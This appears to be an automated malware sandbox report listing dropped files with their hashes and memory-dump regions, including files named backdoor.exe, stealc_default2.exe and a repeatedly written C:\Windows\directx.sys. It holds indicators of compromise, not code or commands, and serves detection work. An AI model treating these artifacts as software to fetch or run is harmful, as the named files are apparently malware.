SHA256 6600b4938a679ecd93d6149fb3f8fe74c8b347106de55a4853a76ae7a204950e
SHA512 3a7505c3faacf6f3e113570545767757d2db5aa342023a4eea27e49e4d632a0064a957c6b07f950e727dd71b8262b768626521cf1d1fbb195fd36d7db7bf5c5a

C:\PROGRA~2\MOZILL~1\UNINST~1.EXE

MD5 3cfd732cd6a3399c411739a8b75b5ae2
SHA1 242b02177cbec61819c11c35c903a2994e83ae10
SHA256 e90c627265bc799db00828179a5d76717a577086755043ba223a9ac78510a2ff
SHA512 b7b61c5f9dab2c6a4e5157a934db5bb26727418698fa44f05fbb9af38cd93dee0261f3f28700bc5cb21e8947a542c3ee6166375ea262c19d41e84c68b0d0fc72

C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE

MD5 d84f63a0bf5eff0c8c491f69b81d1a36
SHA1 17c7d7ae90e571e99f1b1685872f91c04ee76e85
SHA256 06d363997722b0e3c4787f72ca61cb2a8ad59ea7ba8a9d14eafa8a8a550687a2
SHA512 865aab84cfe40604ffd013d8517a538eb1322b90372d236821c0e39e285a20bdad755ddff8d59d8af47a9b10b6c77947abc9148761e75892c617db8503b0ef6e

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MIA062~1.EXE

MD5 4754ef85cf5992c484e75c0859cd0c12
SHA1 199b550e52f74d5a9932b1210979bc79a9b8f6fd
SHA256 da6de758d909ff5b7fb150a4a6a6b9774951aa2bd7c93966ea8951647386c330
SHA512 22c557807b81aac91c65643abb73f212d13f7c4504b6bb14e82bd9cf91319f2daadafa67425d91fa95f1d39c3700684f928e7d68468cb192c4c0be71b9f9b5ab

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE

MD5 4f197c71bb5b8880da17b80a5b59dd04
SHA1 c3d4b54f218768e268c9114aa9cdaf36a48803cd
SHA256 a1a0bf09839e6175e5508271774c6d94f4eb2130c914ea7666c1ecaf1a6fde47
SHA512 e6104ade74dc18e05be756e2a287b9940cdc98150ddd7c562b61282d57070e1d7272316469f1e1b294d3dfbcf191c2692de0d45a2fae59e73c4c039d80f3e002

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~4.EXE

MD5 da18586b25e72ff40c0f24da690a2edc
SHA1 27a388f3cdcfa7357f971b5c4411ea5aa1b9e5f5
SHA256 67f6e8f14bcf0e6d570c1f4ac5a1bb80a4e1470b5bad5a7ee85689c476597d8e
SHA512 3512820a9d37b61f77a79b2d4d3f6aec9ef53dbf81071bee16f5dcc8173393a1cd1bffe9f7f39467b72f9c9271a78e42078e68598934188d9df0b887f2edc5ab

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE

MD5 e6aecae25bdec91e9bf8c8b729a45918
SHA1 3097cddcb7d2a7512b8df9f5637d9bb52f6175ed
SHA256 a60e32baf0c481d6b9db3b84c205716fe2e588cb5089c3d0e4e942e453bf086d
SHA512 c9a6add86a2907f21c5049613fd8300800e4a949a943feea9ab36a271596343328bf0856e3d8dc4784b1c8357e01c3702761b8d9a3170ebd279dc4e1f1cacb01

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE

MD5 5d656c152b22ddd4f875306ca928243a
SHA1 177ff847aa898afa1b786077ae87b5ae0c7687c7
SHA256 4d87b0eb331443b473c90650d31b893d00373ff88dcbcb3747f494407799af69
SHA512 d5e50ee909ea06e69fc0d9999c6d142f9154e6f63462312b4e950cf6e26a7d395dbb50c8e2a8c4f4e1cfb7b2c6ae8ad19e3b7c204c20e7557daa1a0deb454160

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE

MD5 c7f7803a2032d0d942340cfebba0a42c
SHA1 578062d0707e753ab58875fb3a52c23e6fe2adf6
SHA256 0f201a8142c5a8adc36d2a177dd8d430eef2b05cff0e4faefb52440e823b54bb
SHA512 48e3e1eb3a33c1b8c20411209d8ed261c00798393f5fdd691d3fa0abed2849d8eb241bedcbeefddfebbec292c7abd254023e25df77c85b46000fe63a7324172b

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE

MD5 5c78384d8eb1f6cb8cb23d515cfe7c98
SHA1 b732ab6c3fbf2ded8a4d6c8962554d119f59082e
SHA256 9abd7f0aa942ee6b263cdc4b32a4110ddb95e43ad411190f0ea48c0064884564
SHA512 99324af5f8fb70a9d01f97d845a4c6999053d6567ba5b80830a843a1634b02eaf3c0c04ced924cf1b1be9b4d1dbbcb95538385f7f85ad84d3eaaa6dcdebcc8a6

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE

MD5 a5d9eaa7d52bffc494a5f58203c6c1b5
SHA1 97928ba7b61b46a1a77a38445679d040ffca7cc8
SHA256 34b8662d38e7d3d6394fa6c965d943d2c82ea06ba9d7a0af4f8e0571fb5a9c48
SHA512 b6fdc8389bb4d736d608600469be6a4b0452aa3ea082f9a0791022a14c02b8fb7dcd62df133b0518e91283094eaba2be9318316f72d2c4aae6286d3e8686e787

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe

MD5 5119e350591269f44f732b470024bb7c
SHA1 4ccd48e4c6ba6e162d1520760ee3063e93e2c014
SHA256 2b3aa9642b291932ba7f9f3d85221402a9d27078f56ef0e9c6bca633616e3873
SHA512 599b4ec673169d42a348d1117737b4ad4d7539574153df5a5c7689130c9ac5ff5cd00f3c8ec39adf32ff2b56be074081efcabb6456272c649703c3ea6cdaded4

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE

MD5 27543bab17420af611ccc3029db9465a
SHA1 f0f96fd53f9695737a3fa6145bc5a6ce58227966
SHA256 75530dc732f35cc796d19edd11ae6d6f6ef6499ddcf2e57307582b1c5299554c
SHA512 a62c2dd60e1df309ec1bb48ea85184914962ba83766f29d878569549ca20fca68f304f4494702d9e5f09adedc2166e48ee0bc1f4a5d9e245c5490daf15036bea

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE

MD5 11486d1d22eaacf01580e3e650f1da3f
SHA1 a47a721efec08ade8456a6918c3de413a2f8c7a2
SHA256 5e1b1daa9968ca19a58714617b7e691b6b6f34bfacaf0dcf4792c48888b1a5d3
SHA512 5bd54e1c1308e04a769e089ab37bd9236ab97343b486b85a018f2c8ad060503c97e8bc51f911a63f9b96dd734eb7d21e0a5c447951246d972b05fafeef4633da

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE

MD5 eb008f1890fed6dc7d13a25ff9c35724
SHA1 751d3b944f160b1f77c1c8852af25b65ae9d649c
SHA256 a9b7b9155af49d651b092bb1665447059f7a1d0061f88fa320d4f956b9723090
SHA512 9cfe3480f24bf8970ad5773cb9df51d132ee90ada35cbf8ec1222e09a60ae46b2ff4b96862fea19085b1c32f93c47c69f604589fa3f4af17e5d67bef893b6bf1

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe

MD5 6ce350ad38c8f7cbe5dd8fda30d11fa1
SHA1 4f232b8cccd031c25378b4770f85e8038e8655d8
SHA256 06a3bb0bdd2da870bc8dc2c6b760855cea7821273ce59fc0be158149e52915ba
SHA512 4c18a112fec391f443a4ae217ac6d1850e0cfdad4b2d2cbe3f61cb01c0a1400ea6bd5c3ffe0a9978ead50e7f6cfab96ae5090bb9a611f988f1a86ccaa5d4cd4f

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE

MD5 301d7f5daa3b48c83df5f6b35de99982
SHA1 17e68d91f3ec1eabde1451351cc690a1978d2cd4
SHA256 abe398284d90be5e5e78f98654b88664e2e14478f7eb3f55c5fd1c1bcf1bebee
SHA512 4a72a24dec461d116fe8324c651913273ccaa50cb036ccdacb3ae300e417cf4a64aa458869b8d2f3b4c298c59977437d11b241d08b391a481c3226954bba22e4

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE

MD5 41b1e87b538616c6020369134cbce857
SHA1 a255c7fef7ba2fc1a7c45d992270d5af023c5f67
SHA256 08465cc139ee50a7497f8c842f74730d3a8f1a73c0b7caca95e9e6d37d3beed3
SHA512 3a354d3577b45f6736203d5a35a2d1d543da2d1e268cefeffe6bdb723ff63c720ceb2838701144f5fec611470d77649846e0fb4770d6439f321f6b819f03e4db

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE

MD5 5e08d87c074f0f8e3a8e8c76c5bf92ee
SHA1 f52a554a5029fb4749842b2213d4196c95d48561
SHA256 5d548c2cc25d542f2061ed9c8e38bd5ca72bddb37dd17654346cae8a19645714
SHA512 dd98d6fa7d943604914b2e3b27e1f21a95f1fe1feb942dd6956e864da658f4fbd9d1d0cf775e79ceaae6a025aafd4e633763389c37034134bd5245969bec383e

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE

MD5 7c73e01bd682dc67ef2fbb679be99866
SHA1 ad3834bd9f95f8bf64eb5be0a610427940407117
SHA256 da333c92fdfd2e8092f5b56686b94f713f8fa27ef8f333e7222259ad1eb08f5d
SHA512 b2f3398e486cde482cb6bea18f4e5312fa2db7382ca25cea17bcba5ab1ff0e891d59328bc567641a9da05caca4d7c61dc102289d46e7135f947ce6155e295711

C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE

MD5 d9a290f7aec8aff3591c189b3cf8610a
SHA1 7558d29fb32018897c25e0ac1c86084116f1956c
SHA256 41bed95cb1101181a97460e2395efebb0594849e6f48b80a2b7c376ddf5ce0ea
SHA512 b55ab687a75c11ba99c64be42ad8471576aa2df10ce1bb61e902e98827e3a38cd922e365751bd485cac089c2bd8bccf939a578da7238506b77fe02a3eb7994c6

C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE

MD5 d9186b6dd347f1cf59349b6fc87f0a98
SHA1 6700d12be4bd504c4c2a67e17eea8568416edf93
SHA256 a892284c97c8888a589ea84f88852238b8cd97cc1f4af85b93b5c5264f5c40d4
SHA512 a29cc26028a68b0145cb20ec353a4406ec86962ff8c3630c96e0627639cf76e0ea1723b7b44592ea4f126c4a48d85d92f930294ae97f72ecc95e3a752a475087

C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE

MD5 87bb2253f977fc3576a01e5cbb61f423
SHA1 5129844b3d8af03e8570a3afcdc5816964ed8ba4
SHA256 3fc32edf3f9ab889c2cdf225a446da1e12a7168a7a56165efe5e9744d172d604
SHA512 7cfd38ceb52b986054a68a781e01c3f99e92227f884a4401eb9fbc72f4c140fd32a552b4a102bedf9576e6a0da216bc10ce29241f1418acb39aeb2503cb8d703

C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE

MD5 cdc455fa95578320bd27e0d89a7c9108
SHA1 60cde78a74e4943f349f1999be3b6fc3c19ab268
SHA256 d7f214dc55857c3576675279261a0ee1881f7ddee4755bb0b9e7566fc0f425a9
SHA512 35f3741538bd59f6c744bcad6f348f4eb6ea1ee542f9780daa29de5dbb2d772b01fe4774fb1c2c7199a349488be309ceedd562ceb5f1bdcdd563036b301dcd9f

C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE

MD5 674eddc440664b8b854bc397e67ee338
SHA1 af9d74243ee3ea5f88638172f592ed89bbbd7e0d
SHA256 20bbf92426732ff7269b4f2f89d404d5fee0fa6a20944004d2eeb3cc2d1fa457
SHA512 5aced0e2235f113e323d6b28be74da5e4da4dc881629461df4644a52bccd717dc6d2632c40ed8190b3ad060b8b62c347757a0bbe82680d892114c1f0529146b7

C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE

MD5 e4351f1658eab89bbd70beb15598cf1c
SHA1 e18fbfaee18211fd9e58461145306f9bc4f459ea
SHA256 4c783822b873188a9ced8bd4888e1736e3d4f51f6b3b7a62675b0dc85277e0eb
SHA512 57dbc6418011bcac298e122990b14ed1461c53b5f41cb4986d1d3bbbb516c764a7c205fc4da3722399fdb9122f28e4ec98f39d2af80d4b6a64d7bd7944d1c218

C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe

MD5 452c3ce70edba3c6e358fad9fb47eb4c
SHA1 d24ea3b642f385a666159ef4c39714bec2b08636
SHA256 da73b6e071788372702104b9c72b6697e84e7c75e248e964996700b77c6b6f1c
SHA512 fe8a0b9b1386d6931dc7b646d0dd99c3d1b44bd40698b33077e7eeba877b53e5cb39ff2aa0f6919ccab62953a674577bc1b2516d9cadc0c051009b2083a08085

C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe

MD5 9a8d683f9f884ddd9160a5912ca06995
SHA1 98dc8682a0c44727ee039298665f5d95b057c854
SHA256 5e2e22ead49ce9cc11141dbeebbe5b93a530c966695d8efc2083f00e6be53423
SHA512 6aecf8c5cb5796d6879f8643e20c653f58bad70820896b0019c39623604d5b3c8a4420562ab051c6685edce60aa068d9c2dbb4413a7b16c6d01a9ac10dc22c12

C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE

MD5 cbd96ba6abe7564cb5980502eec0b5f6
SHA1 74e1fe1429cec3e91f55364e5cb8385a64bb0006
SHA256 405b8bd647fa703e233b8b609a18999abe465a8458168f1daf23197bd2ea36aa
SHA512 a551001853f6b93dfbc6cf6a681820af31330a19d5411076ff3dbce90937b3d92173085a15f29ebf56f2ef12a4e86860ac6723ebc89c98ea31ea7a6c7e3d7cdc

C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe

MD5 ce82862ca68d666d7aa47acc514c3e3d
SHA1 f458c7f43372dbcdac8257b1639e0fe51f592e28
SHA256 c5a99f42100834599e4995d0a178b32b772a6e774a4050a6bb00438af0a6a1f3
SHA512 bca7afd6589c3215c92fdaca552ad3380f53d3db8c4b69329a1fa81528dd952a14bf012321de92ad1d20e5c1888eab3dd512b1ac80a406baccc37ee6ff4a90dc

memory/4584-233-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Windows\directx.sys

MD5 e1dd58ad5a6ca19998edb9c73e921c07
SHA1 221ce5e6021c3562cad9cec5495c43c527e1e133
SHA256 00da640f2311b66bc839cfebf26853e6da48b859dfbcb6c77ebec7f998039af5
SHA512 d62460a5d27bb33d574afd67b7801201857d645e988323feed301e0dbf4dd4380ef46b53ce5e16f48f7aad176b98626f72a1d471ebc7680baf5ab334ad69747b

memory/404-239-0x0000000000A10000-0x0000000000A94000-memory.dmp

memory/1988-252-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Windows\directx.sys

MD5 d800fafc6e505f2969f1b57815a269fd
SHA1 017587339865f262f998b4f5519e4a3ab9eb944a
SHA256 7092d53c9b3a6f2fa833ae066f690de389b338f2dd9c28c65a5042c3c513f2a2
SHA512 87e0bd79753236b068c910ddd0049fd912f67838ba3c4ae37ea14951890b0bb9f520d5e7c8ca11d8498ba43670d97b3201a7ebc35a4534e4571831361584ed67

memory/2920-258-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2792-259-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2816-261-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2844-262-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3020-263-0x000000001C880000-0x000000001C8D0000-memory.dmp

memory/3020-264-0x000000001C990000-0x000000001CA42000-memory.dmp

memory/2920-265-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2844-266-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\winn.exe

MD5 5e7c5bff52e54cb9843c7324a574334b
SHA1 6e4de10601761ae33cf4de1187b1aefde9fefa66
SHA256 32768587423824856dcd6856228544da79f0a2283f822af41b63a92b5259c826
SHA512 8b07b8470a8536ca0541672cb8bf5dc5ed7fa124cfc454868564b86474d07c17ef985fc731754e4d37cc5c81f8813f0d2b59223e7b3b6268c10ff2af8f39eaa2

C:\Windows\directx.sys

MD5 1fffa1f483b430fcdf5dfd34358c3be3
SHA1 e95d15f95c2d57a0eeea6e59018891d147a8cfd9
SHA256 ba397194d949bf3c44fddebb291a69524429c78737833d41054ec23b543fc519
SHA512 adf11a621516dadbfbf6d323ae1a6a917868878ab34cb6f381a6701c480817424743e3cef3127db11eec85ae0acc9f5366a272490234b67735f8bb5346c4e816

memory/2920-283-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1792-284-0x000001A2F5630000-0x000001A2F5760000-memory.dmp

memory/1792-285-0x000001A2F7BA0000-0x000001A2F7CCA000-memory.dmp

memory/1792-287-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-325-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-339-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-337-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-335-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-333-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-331-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-329-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-327-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-323-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-322-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-319-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-317-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-315-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-313-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-311-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-309-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-307-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-305-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-299-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-297-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-291-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-289-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-286-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-303-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-301-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-295-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-293-0x000001A2F7BA0000-0x000001A2F7CC3000-memory.dmp

memory/1792-1359-0x000001A2F7E40000-0x000001A2F7EE4000-memory.dmp

memory/1792-1360-0x000001A2F7360000-0x000001A2F73AC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\cryptography_module_windows.exe

MD5 ec69806113c382160f37a6ace203e280
SHA1 4b6610e4003d5199bfe07647c0f01bea0a2b917a
SHA256 779a5fe11a1db6a3b4a064a57106c126b306a027b89200c72744eeac0db0bfe2
SHA512 694d1a907abe03bef1d0f39679b920fdb8e14ebf3443d56defedbf31f8fa7458a89d547c9e9c315cdd226f614d1e436afd52622c119cb9d83d9751ff7854c946

C:\Windows\directx.sys

MD5 059fd5d57d7b335b25ac5847d6f37c57
SHA1 4a7b665c184006d8cf5d160c448bf92dce1322be
SHA256 ff28a01b321d9b14b8705fd05341c016034e5d48bf510d014be3bbbfbe75f290
SHA512 d2ec06b99539c59505f13f2229d39c80750e089e1479f945fc55a5fd882e28b64eb33d5b2705ba11f8fbaed679195ac8456dfa17a37128880d5acb4e90dcf3f7

C:\Users\Admin\AppData\Local\Temp\Files\soft.exe

MD5 47f1ea7f21ad23d61eeb35b930bd9ea6
SHA1 dc454a2dfa08394ee0c00b1d19e343a365d2ce40
SHA256 9ef55d2f9f8b77a6d426df4e7b113b7517bbc94eca4230e423d6eef546eb7357
SHA512 c08b36588c194ec8e857aae75b9179175ed2577506819b14839245aa2e46b4d3773404f8af9cf5ecfc6a1162a2a10413038af483e7e566f9f6d097e534bb6c70

C:\Windows\directx.sys

MD5 5907c465cd65ee2dbb2e0308e5afc19c
SHA1 a3d24cb2a588973dd55da85f5435ccc887a05567
SHA256 2e67f3b68c4793bb1208551aa03e0fe29789fe3f91321f37d104646dc11c9ad8
SHA512 0d0e6a70fb60636d16ee31076f9a53a459865fc92cb48ffd007c93c7b7f8b33fc134b70ff4c2701faafbb9d2ead21184152751c51808ad11c6f7b3ccf3953501

C:\Users\Admin\AppData\Local\Temp\Files\random.exe

MD5 b58725b0a514974aae36a20730adc4b3
SHA1 a99eb4395fc9a95cad952a7d4bd444fb3baa9103
SHA256 a64238bb65c406ec9ef9267f96de8b2ff4a2dc1998859970f2b7399aed50db76
SHA512 21ed4926463abff571fa30161607cfc58ef2106683295830764a6008d9e6c1228271966c951c030b13db295217b7f568797ebf74fb02a4ed86d198a34d9b7a29

C:\Windows\directx.sys

MD5 535b859daff613d5b62902e9405babe1
SHA1 4903c279c3beac744c9cd03c41bc829c419b3ea8
SHA256 01f773a003d6c8fcf86b04afe41b569e78d109a321cd95b00623549518b5cc37
SHA512 136d313f0c181b3a3e3cd81d69247c85e8cbe2f7fe9923b0da66757bfd6f481c97fb36c054098e87683ed4264da282227cff409fe7dac80f23d01622a2c78115

memory/1264-1496-0x00000000009B0000-0x0000000000E7C000-memory.dmp

memory/1264-1500-0x00000000009B0000-0x0000000000E7C000-memory.dmp

C:\Windows\directx.sys

MD5 b47b1059bc03ddbc7358f460a5ed54ff
SHA1 17156817a5fb3f1a264c5317bf07393e6bdc9a11
SHA256 e080784f9dae588a5aeeba9ba14d1d314e4eda77ad0673662f25c0799b6ac19d
SHA512 f6a1253d89335a70e37bfdd4196896a53f6f7b71d971e1e5dec3b6b8a1d11cac7e92af44371cbd2bfc8444cde4ff866f3b67068ecf1fa8a3412889ec4128897d

memory/1088-1506-0x0000000000A20000-0x0000000000EEC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\m.exe

MD5 0c883b1d66afce606d9830f48d69d74b
SHA1 fe431fe73a4749722496f19b3b3ca0b629b50131
SHA256 d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1
SHA512 c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

C:\Windows\directx.sys

MD5 84ee29475532863d7e6aa53705cf40a9
SHA1 acb3d49dd7de902e320031fbffc6d943475df504
SHA256 c48e73150bebc48acc81bfa1bbe0729a678c3fe2f90cb35598a5ae0b19bf33a0
SHA512 907ba3f6bb0f16aed5943c06129e41a89f715c33a3d34e52252da90263c7552a4202d9bc9fafd80fe780613e14843348a5406090b25eb3fc4fdbf233da911212

memory/3832-1530-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/1088-1528-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/3896-1543-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/3832-1542-0x0000000000A20000-0x0000000000EEC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\Trojan.Malpack.Themida%20(Anti%20VM).exe

MD5 922246d2938c77b783e112830796aa9f
SHA1 68212e1c4d8852a67fac6a1aa0e7d2672bba310d
SHA256 c7abff0928c85d80fcaad1ca24ecfe50a979f377652b96f25e3574a2eca772bf
SHA512 b56ed54b412d6b536318b8289354a3a58e1c967be179d429b9ebfa44406e579f014a7e635e11e24d206325354c66fc59b50e6fca7f221a0b6f85a0589a5efbe4

C:\Windows\directx.sys

MD5 26aeffdc244fd2dd93ff072f968e7530
SHA1 5dc28c451bb62db8fa9539af26abde0dd6ed7c54
SHA256 600b6acf583bca5f1296aa032fd4b1c1cc4fe1251f970c6d5a078ad3c9745011
SHA512 a3a9eab795c500f906e6b8d95c81cbf41148eba7134070356d2b7c35b31fd456a05f55d45aba67f0a309aca7df397f0be15682c6a75180e5d30db1eb3a7b60ce

C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe

MD5 698f5896ec35c84909344dc08b7cae67
SHA1 4c3eb447125f74f2eef63e14a5d97a823fa8d4e9
SHA256 9cc2e2d5feeb360b2ea9a650809468f08e13c0e997ebadf5baa69ae3c27a958e
SHA512 2230abef3f2ac7fff21f2af8a1df79a0ab3f7b1153ce696745ff5cef7f677bfe562dc820eb36be8e4819210ffa565d52e3b940f0cad5427d30a3aa05a4bcde2b

memory/3484-1568-0x0000000000090000-0x0000000000C58000-memory.dmp

C:\Windows\directx.sys

MD5 dd35cb97b4d3da56073aff7562b698d5
SHA1 b908da66d22444420522295339c06a4e5206a3e7
SHA256 f0852a362e8aa6f931fa2b46bd9567bab80fed0cf0cd9e44dea1b84a052064f3
SHA512 7a5c45aece666c9f190ca045afc6b9242b0b108280d7bb2bbdde91015b90a32bd5c2e36b273b62e345cc522a70ac447c12583da5d3decef1a1daece1a3b6187b

memory/3896-1595-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/1840-1596-0x0000000000A20000-0x0000000000EEC000-memory.dmp

C:\Windows\directx.sys

MD5 0c2337d2fbca82e6c189ed97861d8461
SHA1 3e3950423947646040de2e3b98b7ad00d235e2ec
SHA256 9b51e2c22d0b9d766d8740e8297dde38a19a657d84a6cb8c705d03e7289867be
SHA512 58edc987be7e5ea8e9342cb33d510bc0f892dbb43d41ab19a569393336a2d381bc7a6135bb5a6489a40b5584d683276939b960951e1ea767e6a4ec9711deb649

C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe

MD5 90aadf2247149996ae443e2c82af3730
SHA1 050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256 ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512 eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

memory/1840-1619-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/1368-1622-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/5036-1620-0x0000026F8B520000-0x0000026F8B5DA000-memory.dmp

memory/1792-1607-0x000001A2F7CD0000-0x000001A2F7D24000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tt3f3v55.xcn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4980-1631-0x000001887D470000-0x000001887D492000-memory.dmp

memory/4496-1645-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/1368-1650-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/4496-1655-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/2892-1662-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/556-1664-0x0000000000290000-0x0000000000296000-memory.dmp

C:\Windows\directx.sys

MD5 8e966011732995cd7680a1caa974fd57
SHA1 2b22d69074bfa790179858cc700a7cbfd01ca557
SHA256 97d597793ec8307b71f3cfb8a6754be45bf4c548914367f4dc9af315c3a93d9b
SHA512 892da55e0f4b3ff983019c11d58809fdcb8695d79c617ddc6251791308ee013bf097d1b4a7541140f7a01c56038a804974a4f154cc1b26e80e5cf5c07adf227c

memory/3484-1679-0x0000000000090000-0x0000000000C58000-memory.dmp

memory/2892-1687-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/2124-1685-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/2124-1704-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/3484-1730-0x0000000000090000-0x0000000000C58000-memory.dmp

memory/3576-1731-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/3484-1734-0x0000000000090000-0x0000000000C58000-memory.dmp

memory/3484-1736-0x0000000003600000-0x0000000003692000-memory.dmp

memory/2268-1735-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/3484-1737-0x00000000068A0000-0x0000000006E46000-memory.dmp

memory/4316-1748-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/3576-1750-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/4316-1753-0x0000000000A20000-0x0000000000EEC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe

MD5 68a99cf42959dc6406af26e91d39f523
SHA1 f11db933a83400136dc992820f485e0b73f1b933
SHA256 c200ddb7b54f8fa4e3acb6671f5fa0a13d54bd41b978d13e336f0497f46244f3
SHA512 7342073378d188912b3e7c6be498055ddf48f04c8def8e87c630c69294bcfd0802280babe8f86b88eaed40e983bcf054e527f457bb941c584b6ea54ad0f0aa75

memory/1080-1763-0x0000000002450000-0x0000000002486000-memory.dmp

memory/1080-1764-0x0000000004F40000-0x000000000560A000-memory.dmp

memory/1080-1765-0x0000000004E80000-0x0000000004EA2000-memory.dmp

memory/1080-1776-0x0000000005780000-0x00000000057E6000-memory.dmp

memory/1080-1775-0x0000000005710000-0x0000000005776000-memory.dmp

memory/1080-1784-0x00000000057F0000-0x0000000005B47000-memory.dmp

C:\Windows\directx.sys

